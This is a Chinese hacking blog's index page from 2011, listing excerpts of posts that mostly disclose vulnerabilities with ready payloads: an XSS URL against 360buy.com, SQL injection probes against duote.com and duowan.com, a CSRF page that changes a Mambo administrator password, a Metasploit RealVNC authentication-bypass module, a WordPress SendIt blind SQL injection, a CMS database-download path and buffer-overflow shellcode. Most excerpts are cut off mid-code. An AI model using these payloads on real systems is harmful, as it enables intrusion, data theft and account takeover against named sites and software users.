• 京东商城存在跨站

    京东商城存在跨站
    http://www.360buy.com/djdService.aspx?skuIds=389203%2C407401%2C374280%2C&callback=jsonp1314267254816″‘><body id=ssltest title=if(window.x!=1){alert(x=1)} onload=eval(ssltest.title)>
    作者:unhonker| 发布:2011年8月27日 | 分类:技术文章 | 阅读:2,858次|
  • RealVNC的验证绕道

    RealVNC的验证绕道
    require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'RealVNC Authentication Bypass', 'Description' => %q{ This module exploits an Authentication Bypass Vulnerability ...
    作者:unhonker| 发布:2011年8月27日 | 分类:漏洞公布 | 阅读:3,175次|
  • 极瑞企业网站系统爆库

    极瑞企业网站系统爆库
    默认后台:admin/login.asp 默认数据库:database/%23zhiyuan_date_1003.mdb 官方演示站:http://www.li07.com/demo/01/ 漏洞文件:include/conn.asp 漏洞成因:无容错 漏洞利用: http://www.unhonker.com/include%5cconn.asp
    作者:unhonker| 发布:2011年8月26日 | 分类:技术文章 | 阅读:2,878次|
  • 曼波4.6.5 CSRF的Vuln(更改管理员密码)

    曼波4.6.5 CSRF的Vuln(更改管理员密码)
    ExpLo!T : <html> <head> </head> <body onload="javascript:fireForms()"> <script language="JavaScript"> function fireForms() { var count = 1; var i=0; for(i=0; i<count; i++) { document.forms[i].submit(); } } </script> <form action="http://site.com/administrator/index.php?o...
    作者:unhonker| 发布:2011年8月26日 | 分类:漏洞公布 | 阅读:3,106次|
  • WordPress的SendIt插件

    WordPress的SendIt插件
    [ submit.php line 27 ] $user_count = $wpdb->get_var("SELECT COUNT(*) FROM $table_email where email ='$_POST[email_add]' and id_lista = '$_POST[lista]';"); As you can see, $_POST[lista] parameter is nor validated neither escaped, so you can blind sql inject it using $user_count for the boolean condition checking : [ submit.php line 29 ] if...
    作者:unhonker| 发布:2011年8月26日 | 分类:技术文章 | 阅读:2,559次|
  • 我把老板抄了

    我把老板抄了
    哥今天把老板抄了,尼玛把我一人当两人用啊,又维护服务器又作图的,最后给我来一句:“你做的图不能看。” 我草,你以为哥是Helen啊!!!  老板 我草尼玛
    作者:unhonker| 发布:2011年8月25日 | 分类:个人关注 | 阅读:2,758次|
  • 多特网多个注入漏洞

    多特网多个注入漏洞
    php?ztid=44+AnD+1=1″>http://www.duote.com/zhuanti/comment/index.php?ztid=44+AnD+1=1 http://www.duote.com/zhuanti/comment/index.php?ztid=44+AnD+1=2 http://db.duowan.com/zx2/eqinfo.php?id=25294
    作者:unhonker| 发布:2011年8月25日 | 分类:技术文章 | 阅读:2,665次|
  • 视频合并分割本地缓冲区溢出

    视频合并分割本地缓冲区溢出
    $junk = "x41" * 1600 $ret = "x77xBDxxEBx7B" $nop = "x90" x 20 shellcode = "x33xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x8c". "x35xa9x3ex83xebxfcxe2xf4x70xddxedx3ex8cx35x22x7b". "xb0xbexd5x3bxf4x34x46xb5xc3x2dx22x61xacx34x42x77". "x07x01x22x3fx62x04x69xa7x20xb1x69x4ax8bxf4x63x33". "x8dxf7x42xcaxb7x61x8dx3axf9xd0x22x61xa8x34x42x58". "x07x39xe2xb5...
    作者:unhonker| 发布:2011年8月25日 | 分类:漏洞公布 | 阅读:3,213次|
  • 08小组社区关闭

    08小组社区关闭
    08小组  www.huc08.com 各位朋友:抱歉了,08小组让你们失望了; 08小组现在是在强撑阶段,我们觉得强撑还不如关闭,也能静下心来仔细想想08小组的以前和08小组以后的发展。 我们考虑了很久,最终决定关闭08小组; 也将带领08小组的成员们进行学习,我相信等08小组再度开放的时候,绝对会让大家看; 08小组的关闭可能会让某些人很开心,我们想说的是:08小组社区关闭了,但...
    作者:unhonker| 发布:2011年8月25日 | 分类:业界新闻 | 阅读:0次|
  • 08小组新手入门教程

    08小组新手入门教程
    ShopXP v8.0 漏洞利用演示 http://down.qiannao.com/space/file/08group/share/2011/8/24/ShopXP-0020v8.0-0020-6f0f-6d1e-5229-7528-6f14-793a.zip/.page   sk企业网站管理系统SQL注入漏洞 http://down.qiannao.com/space/file/08group/share/2011/8/24/sk-4f01-4e1a-7f51-7ad9-7ba1-7406-7cfb-7edfSQL-6ce8-5165-6f0f-6d1e.rar/.page   阿曼达企业网站管理系统...
    作者:unhonker| 发布:2011年8月25日 | 分类:技术文章 | 阅读:3,359次|